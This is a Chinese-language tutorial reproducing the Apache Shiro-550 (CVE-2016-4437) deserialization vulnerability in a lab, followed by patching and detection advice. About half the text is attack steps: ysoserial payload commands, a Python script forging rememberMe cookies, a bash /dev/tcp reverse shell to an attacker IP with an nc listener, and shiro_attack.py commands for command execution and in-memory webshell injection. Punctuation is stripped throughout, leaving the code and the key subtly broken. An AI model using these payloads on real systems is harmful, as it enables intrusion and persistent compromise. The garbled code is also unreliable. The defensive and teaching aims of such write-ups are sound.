1. 项目概述Shiro-550漏洞的来龙去脉如果你在安全圈待过一段时间或者接触过Java Web安全那么“Shiro-550”这个名字你一定不陌生。它就像一道经典的“必考题”几乎每个渗透测试工程师的成长路上都会遇到。这个漏洞的官方编号是CVE-2016-4437但大家更习惯叫它Shiro-550或者直接叫“Shiro反序列化漏洞”。我第一次接触这个漏洞是在一次内部红蓝对抗中当时一个看似固若金汤的Java应用就因为一个“记住我”的勾选框被我们成功拿下其背后的核心就是这个Shiro-550。它之所以经典是因为它完美地诠释了“功能即风险”——一个为了方便用户登录而设计的“记住我”功能由于密钥硬编码和反序列化机制的不安全变成了攻击者直通服务器后台的“后门”。这个漏洞影响范围极广从2016年披露至今依然能在不少老旧系统甚至一些疏于安全更新的新系统上找到它的身影。理解并复现它不仅是掌握一个漏洞利用技巧更是深入理解Java安全、反序列化攻击链和加密签名的绝佳入口。无论你是刚入门的安全爱好者还是想巩固基础的从业者跟着我一起拆解这个漏洞你收获的将远不止一个EXP漏洞利用程序。2. 漏洞核心原理深度拆解要真正理解Shiro-550我们不能停留在“有个默认密钥”的层面必须深入到Shiro框架处理“记住我”这个功能的每一个环节。这就像拆解一个精密的锁具你需要知道它的锁芯序列化数据、钥匙加密密钥和开锁机制反序列化过程分别是什么以及哪里出了错。2.1 “记住我”功能的安全设计初衷与缺陷Apache Shiro是一个功能强大且易用的Java安全框架它提供了认证、授权、加密和会话管理等功能。其中RememberMe记住我是一个非常用户友好的特性。用户登录时如果勾选了“记住我”Shiro就不会在浏览器会话关闭后要求用户重新登录。它的理想工作流程是这样的用户成功登录并勾选“记住我”。服务端生成凭证Shiro会将用户的身份信息Principal和凭证Credential等序列化成Java对象。加密与签名将这个序列化后的字节数组使用AES一种对称加密算法进行加密然后再进行Base64编码。这里的关键是为了确保这个Cookie在传输过程中不被篡改Shiro还会使用一个密钥cipherKey对加密后的数据进行签名实际上在Shiro 1.2.4及之前版本加密和签名用的是同一个密钥。发送Cookie将这个处理后的字符串设置为名为rememberMe的Cookie发送给用户的浏览器。下次访问用户再次访问时浏览器会自动带上这个rememberMeCookie。服务端验证Shiro接收到Cookie后先进行Base64解码然后用相同的密钥验证签名并解密最后将字节流反序列化成Java对象从而自动完成用户登录。那么致命缺陷在哪里缺陷一在于密钥硬编码。在Shiro 1.2.4及之前版本用于加密和签名的AES密钥是硬编码在框架源代码中的。这个密钥是kPHbIxk5D2deZiIxcaaaA。这意味着全球所有使用该版本Shiro且开启了“记住我”功能的系统都在使用同一把“万能钥匙”。攻击者只要知道了这个密钥就能伪造任何人的“记住我”Cookie。缺陷二在于反序列化未受控。Shiro在解密Cookie数据后会直接对其执行ObjectInputStream.readObject()进行反序列化。这个操作是极其危险的因为它会按照序列化数据的描述在服务端自动创建对象、执行其readObject方法。如果序列化数据中包含恶意构造的、能执行命令的“ gadget chains”利用链那么反序列化过程就会变成攻击者的代码执行器。注意这里有一个关键点Shiro的解密过程必须成功反序列化才会发生。如果使用错误的密钥解密得到的是乱码反序列化时会直接抛出异常攻击无法继续。所以知道或猜解出正确的密钥是攻击的前提。2.2 反序列化攻击链从数据到命令执行理解了漏洞入口我们还需要一把“武器”才能造成实际伤害。这就是Java反序列化漏洞利用链。单纯的序列化数据只是一串字节我们需要在其中“植入”能在反序列化时自动触发恶意行为的代码。在Shiro-550的利用史上最常用的是CommonsCollections利用链特别是CC2 CC3 CC4等变种。Apache Commons Collections是一个广泛使用的Java库它提供了一系列增强的数据结构。其中一些类的特性如Transformer、InvokerTransformer可以被巧妙地串联起来形成一个在反序列化时能动态执行任意Java代码的链条。简单来说攻击者会构造一个恶意的Java对象这个对象由ChainedTransformer、LazyMap、TiedMapEntry、BadAttributeValueExpException等类精心组装而成。这个对象在被序列化后其字节码就包含了攻击逻辑。利用Shiro的硬编码密钥将这个恶意序列化对象的字节数组进行AES-CBC加密和Base64编码伪造出一个合法的rememberMeCookie。将伪造的Cookie发送给目标Shiro应用。目标应用用默认密钥成功解密Cookie得到恶意序列化数据。在反序列化readObject()过程中恶意利用链被触发最终执行攻击者预设的命令例如在服务器上启动一个计算器calc或者反弹一个Shell。为什么是CommonsCollections因为它太常见了。很多Java Web应用都会间接依赖这个库。攻击者无需向服务器上传任何文件只需要找到一个存在于目标应用Classpath中的、可利用的库CommonsCollections就是典型代表就能完成攻击。这种攻击方式被称为“ysoserial”风格ysoserial正是一个集成了多种Java反序列化利用链的著名工具。3. 漏洞复现环境搭建与工具准备纸上得来终觉浅绝知此事要躬行。接下来我们动手搭建一个靶场亲身体验一次完整的Shiro-550漏洞利用过程。我会带你一步步操作并解释每个步骤背后的意图。3.1 靶场环境选择与部署为了安全且贴近实战我们通常在虚拟机或隔离的Docker环境中进行漏洞复现。这里我推荐两种最常用的方式方案一使用集成漏洞靶场推荐新手vulhub和VulApps是当前最流行的漏洞环境集合项目。它们提供了大量预构建的Docker镜像一键启动即可。安装Docker确保你的实验机建议使用Linux虚拟机如Ubuntu已安装Docker和docker-compose。拉取vulhub项目git clone https://github.com/vulhub/vulhub.git进入Shiro漏洞目录cd vulhub/shiro/CVE-2016-4437启动环境docker-compose up -d这条命令会拉取一个内置了存在Shiro-550漏洞的Web应用的镜像并运行。访问http://your-vm-ip:8080就能看到靶场登录页面。方案二手动搭建简易漏洞应用深入理解如果你想更清楚地看到漏洞代码可以自己写一个简单的Shiro应用。创建一个Maven Web项目。在pom.xml中引入存在漏洞的Shiro版本依赖例如dependency groupIdorg.apache.shiro/groupId artifactIdshiro-web/artifactId version1.2.4/version !-- 漏洞版本 -- /dependency dependency groupIdorg.apache.shiro/groupId artifactIdshiro-spring/artifactId version1.2.4/version /dependency在shiro.ini或Spring配置中配置rememberMe管理器并且不覆盖默认的cipherKey。部署到Tomcat等Servlet容器。实操心得对于复现学习强烈推荐使用vulhub。它环境纯净不会污染你的主机而且关闭简单docker-compose down。手动搭建更适合于代码级分析和调试但步骤繁琐容易在环境问题上卡住。3.2 必备工具清单及作用解析工欲善其事必先利其器。复现Shiro-550你需要下面几个核心工具探测工具Shiro检测脚本作用快速判断一个网站是否使用了Shiro框架以及rememberMeCookie的响应特征。推荐shiro_attack.py一款集探测、密钥爆破、利用于一体的优秀工具或者专门的检测脚本。它们会发送一个携带无效rememberMeCookie的请求通过分析响应包中的rememberMedeleteMe等特征来判断。密钥爆破工具作用由于部分系统可能会修改默认密钥我们需要一个常用密钥字典来尝试爆破。推荐shiro_attack.py内置了强大的爆破模块它使用dnslog技术进行无回显的密钥碰撞检测效率极高。你也可以使用shiro-exploit等工具。利用链生成工具作用根据目标环境可用的依赖库如CommonsCollections版本生成对应的恶意序列化Payload并加密成最终的rememberMeCookie。推荐ysoserialJava反序列化利用链的“瑞士军刀”。你需要本地安装Java环境来运行它生成Payloadjava -jar ysoserial.jar CommonsCollections2 calc。shiro_attack.py同样集成了此功能它内部调用ysoserial的逻辑并自动完成加密、编码全过程直接生成可用的Cookie或提供反弹Shell的Payload。网络请求工具作用发送HTTP请求测试漏洞。推荐Burp Suite图形化功能全面、curl命令行快速方便或Python requests库便于编写自动化脚本。监听工具用于反弹Shell作用当你想获取一个交互式命令行Shell时需要在你的攻击机上开启一个网络监听端口。推荐nc(Netcat)命令如nc -lvnp 4444。将上述工具提前准备好放在一个专门的目录下。接下来我们就进入实战环节。4. 漏洞手工复现实战全流程假设我们已经通过vulhub启动了靶场地址是http://192.168.1.100:8080。下面我们一步步手工复现让你看清每一个环节。4.1 第一步目标识别与Shiro框架探测首先我们需要确认目标使用了Shiro并且可能存在漏洞。打开浏览器或Burp Suite访问靶场地址。你会看到一个简单的登录页面。打开浏览器开发者工具F12的“网络”(Network)选项卡或者用Burp Suite拦截请求。尝试登录任意用户名密码并勾选“记住我”选项然后提交。观察服务器返回的HTTP响应头。重点查找Set-Cookie字段。如果你看到一个名为rememberMe的Cookie被设置其值是一长串Base64样式的字符串那么基本可以确定Shiro框架被启用并且“记住我”功能是打开的。更专业的探测是发送一个特制的请求。我们可以用curl发送一个携带错误rememberMeCookie的请求curl -v http://192.168.1.100:8080/login -H Cookie: rememberMe123观察响应。如果Shiro存在并且在处理错误的rememberMeCookie后会在响应中返回一个rememberMedeleteMe的Cookie用于删除客户端的无效Cookie这就是一个强烈的特征信号。4.2 第二步默认密钥验证与利用链探测确认Shiro存在后我们假设它使用的是默认密钥。使用shiro_attack.py进行综合检测这是目前最高效的方式python3 shiro_attack.py http://192.168.1.100:8080运行后工具会自动进行以下操作检测Shiro是否存在。使用内置的常见密钥字典包含kPHbIxk5D2deZiIxcaaaA进行爆破。如果找到有效密钥它会进一步探测目标服务器的Classpath中是否存在可用的反序列化利用链如CC2, CC3, CC4, CB等。 工具的输出会明确告诉你是否找到密钥以及哪些利用链是可用的。手工验证密钥理解原理 如果不用自动化工具你可以手动验证。原理是用默认密钥加密一个简单的序列化数据比如一个java.lang.String对象发送给服务器。如果服务器能正常解密不报错且响应中没有deleteMe说明密钥正确。 但这需要你编写一个小程序来模拟Shiro的加密过程对于复现来说直接用工具更高效。4.3 第三步构造恶意Payload并执行命令假设工具告诉我们密钥是默认的并且CommonsCollections2CC2利用链可用。现在我们要执行命令。场景一执行简单命令如弹出计算器生成Payload我们可以使用ysoserial生成一个执行calc.exeWindows或gnome-calculatorLinux如果靶场有GUI的Payload。但由于我们的Docker靶场通常是无GUI的我们更常执行ping或curl命令来验证漏洞是否可利用。# 生成一个执行 sleep 5 命令的PayloadLinux java -jar ysoserial.jar CommonsCollections2 sleep 5 payload.bin这会将恶意序列化对象写入payload.bin文件。加密并编码Payload我们需要编写一个Python脚本使用Shiro的AES-CBC模式、默认密钥和固定的IV对payload.bin进行加密和Base64编码。这个过程正是shiro_attack.py工具内部所做的。手工实现代码片段如下import base64 from Crypto.Cipher import AES from Crypto.Util.Padding import pad def shiro_encrypt(key, payload): # Shiro使用的AES模式是CBCIV是密钥的前16个字节 iv key[:16] cipher AES.new(key, AES.MODE_CBC, iv) # 需要先对payload进行PKCS5Padding填充 encrypted cipher.encrypt(pad(payload, AES.block_size)) return base64.b64encode(encrypted).decode() key base64.b64decode(kPHbIxk5D2deZiIxcaaaA) with open(payload.bin, rb) as f: payload f.read() rememberMe_cookie shiro_encrypt(key, payload) print(rememberMe_cookie)运行脚本得到最终的rememberMeCookie值。发送攻击请求使用curl或Burp Repeater携带伪造的Cookie发送请求。curl http://192.168.1.100:8080/ -H Cookie: rememberMe上一步生成的Cookie值发送请求后如果服务器端执行了sleep 5命令那么这个请求的响应时间会明显延迟约5秒这就证明了命令执行成功。场景二获取反向Shell更实用的攻击执行一个临时命令证明漏洞存在但获取一个交互式Shell才是渗透测试的常见目标。在攻击机你的Kali或虚拟机上启动监听nc -lvnp 4444生成反弹Shell的Payload。我们需要生成一个能连接回我们攻击机的命令。例如使用bash反弹# 假设攻击机IP是192.168.1.50端口4444 bash -c bash -i /dev/tcp/192.168.1.50/4444 01但是这个命令包含特殊字符直接传给ysoserial可能有问题。通常我们会先将其进行Base64编码。echo bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjEuNTAvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i} # 这是一个经过处理的、适合在Java中传递的命令格式具体需要根据ysoserial和目标的bash环境调整。更可靠的方法是使用shiro_attack.py它内置了生成各种反弹Shell Payload的功能并自动处理编码问题。# 使用shiro_attack.py直接生成反弹Shell的利用数据 python3 shiro_attack.py http://192.168.1.100:8080 “反弹shell” -k “kPHbIxk5D2deZiIxcaaaA” -g CommonsCollections2 -p “192.168.1.50:4444”工具会生成一个完整的HTTP请求数据包你只需要复制粘贴到Burp Suite中重放即可。发送Payload将工具生成的请求发送到目标。如果一切顺利你会在nc监听窗口看到来自目标服务器的Shell连接。重要注意事项在实际渗透测试中必须获得书面授权才能对目标系统进行漏洞利用。未经授权的攻击是违法行为。本复现仅在你自己搭建的隔离靶场环境中进行。5. 自动化工具利用与实战技巧虽然手工复现能加深理解但在实战中效率至关重要。shiro_attack.py这类自动化工具将探测、密钥爆破、利用链检测、Payload生成和发送融为一体。5.1 高效利用 shiro_attack.py这个工具是当前利用Shiro漏洞的“神器”。它的基本工作流程如下探测发送特征请求确认Shiro。爆破使用多线程和DNSLog技术快速碰撞出正确的密钥。DNSLog的原理是让目标服务器在执行Payload时尝试访问一个由攻击者控制的、唯一的子域名。如果密钥正确且命令执行成功攻击者就能在DNSLog平台上看到解析记录从而无回显地确认密钥和漏洞存在。检测Gadget利用找到的密钥发送一些不执行命令但能触发特定类加载的“探测Payload”根据响应时间或错误信息判断哪些利用链CC2, CC3, CB1等在目标Classpath中可用。利用根据选择的利用链和攻击类型命令执行、反弹Shell、内存马注入等生成最终的攻击Payload并发送。常用命令示例# 1. 全自动检测从探测到利用链检测 python3 shiro_attack.py http://target.com # 2. 指定密钥和利用链进行命令执行 python3 shiro_attack.py http://target.com “whoami” -k “已知的密钥” -g CommonsCollections2 # 3. 生成反弹Shell的Payload不直接发送 python3 shiro_attack.py http://target.com “反弹shell” -k “已知密钥” -g CommonsCollections2 -p “你的IP:端口” --no-progress5.2 内存Webshell注入技术在攻防演练中直接执行命令容易被入侵检测系统IDS发现。更高级、更隐蔽的持久化手段是注入内存Webshell。shiro_attack.py也支持此功能。原理利用反序列化漏洞在目标Java应用的运行时内存中动态注册一个恶意的Filter或Servlet。这个恶意组件被映射到一个特定的URL路径如/favicon。攻击者后续通过访问这个特定路径并传递参数就能实现远程命令执行效果类似于一个不需要写入磁盘的Webshell。操作# 使用工具注入内存马例如注入一个冰蝎Behinder兼容的内存马 python3 shiro_attack.py http://target.com “内存马” -k “已知密钥” -g CommonsCollections2 -p “注入的URL路径如/favicon”注入成功后攻击者就可以使用对应的客户端如冰蝎、哥斯拉直接连接http://target.com/favicon进行文件管理、命令执行等操作而管理员在服务器磁盘上找不到任何可疑的Webshell文件排查难度极大。实操心得内存马是当前Java Web攻防的热点。防御方需要借助Java Agent技术或RASP运行时应用自保护进行内存扫描才能有效发现。对于攻击方要特别注意内存马的兼容性不同中间件Tomcat, Jetty, WebLogic的注入方式略有不同。6. 漏洞修复方案与防御纵深构建复现漏洞是为了更好地防御。作为开发或安全人员我们必须知道如何修复和防范此类问题。6.1 官方修复方案与升级指南Apache Shiro官方在漏洞披露后迅速发布了修复版本。根本修复升级到Shiro 1.2.5及以上版本。在新版本中移除了硬编码的默认密钥。如果开发者不显式配置cipherKeyShiro在启动时会动态生成一个随机的密钥。这意味着每个部署的应用都有自己独一无二的密钥彻底杜绝了默认密钥的通用性风险。升级步骤修改项目pom.xml或build.gradle中的Shiro版本号。仔细检查官方升级日志注意API是否有不兼容的变更。重新编译和部署应用。重要提醒仅仅升级版本可能不够。如果开发者在配置文件中手动设置了一个弱密钥例如123456风险依然存在。因此升级后必须检查配置。6.2 安全加固配置与最佳实践除了升级还应采取以下防御措施构建纵深防御体系强制指定强密钥即使在新版Shiro中也建议在配置中主动设置一个足够复杂且保密的cipherKey。这个密钥应像数据库密码一样被妥善管理建议从环境变量或配置中心读取而非写在代码里。# shiro.ini 示例 securityManager.rememberMeManager.cipherKey mySuperStrongAndSecretKeyHereBase64Encoded禁用反序列化功能如果不需要对于确定不需要“记住我”功能的系统最彻底的方式是直接关闭它。在Shiro配置中不配置RememberMeManager即可。使用Java安全策略限制反序列化可以通过配置java.security文件使用ObjectInputFilterJEP 290在Java 9及高版本JDK 8u121后引入来限制允许反序列化的类。这是JVM层面的防护能有效阻断未知的利用链。# JVM启动参数示例 -Djdk.serialFiltermaxdepth5;!org.apache.commons.collections.functors.*依赖库安全管理移除不必要的依赖定期审查项目依赖移除如commons-collections等存在高危利用链的库。如果业务必须使用应升级到已修复漏洞的版本但commons-collections 3.x的漏洞在库本身层面未完全修复需依靠其他防护。使用安全组件考虑使用更安全的序列化/反序列化替代方案如JSONJackson, Gson、Protocol Buffers等。部署Web应用防火墙WAF与RASPWAF可以在网络层拦截含有可疑rememberMeCookie长度或特征的请求。RASP在应用运行时内部进行防护能够更精准地检测和阻断恶意的反序列化行为是防御此类内存攻击的有效手段。7. 排查与防御从攻击者视角看防护经历过攻击才能更好地防御。我们从攻击者的操作链出发看看防守方如何在每个环节进行布防。信息收集阶段防守点隐藏技术栈信息。避免在错误页面、响应头中泄露Shiro、JSESSIONIDShiro默认的会话Cookie名等框架特征。可以自定义Cookie名称和错误处理页面。密钥爆破阶段防守点使用强密钥并妥善保管。这是最根本的。此外可以实施请求频率限制对短时间内大量尝试不同rememberMeCookie的IP进行封禁或验证码挑战。利用链探测与Payload执行阶段防守点这是核心防御层。升级与打补丁如前所述升级Shiro移除危险依赖库或升级其版本。部署RASPRASP能够深入应用内部监控ObjectInputStream.readObject()等危险方法的调用分析反序列化的类是否属于黑名单或行为是否异常从而实时阻断攻击。完善监控与告警在服务器和应用日志中监控异常错误特别是与反序列化、类加载相关的错误。建立告警机制对疑似攻击行为及时响应。内存马驻留阶段防守点这是最难防御的阶段。定期内存扫描使用Arthas、Java Agent工具或商业安全产品定期对运行中的Java进程进行内存扫描查找可疑的Filter、Servlet或Controller映射。应用行为基线建立应用正常行为基线当出现未知的URL映射或异常的网络连接时产生告警。Shiro-550的复现与分析之旅到此告一段落。这个漏洞像一本教科书涵盖了密钥安全、反序列化、依赖链利用等多个核心安全知识点。我个人的体会是在安全领域没有一劳永逸的银弹。防御Shiro-550这类漏洞需要从开发阶段的“安全编码”使用强密钥、构建阶段的“依赖管理”移除危险库、部署阶段的“安全配置”JVM策略到运行阶段的“主动防御”RASP、监控形成一条完整的链条。作为防御者只有比攻击者更了解整个攻击路径才能在每个环节设下有效的关卡。最后一个小技巧是在日常安全巡检中可以尝试用已知的默认密钥对自己公司的系统进行一次授权的、温和的探测你会发现历史遗留的风险往往比想象中要多。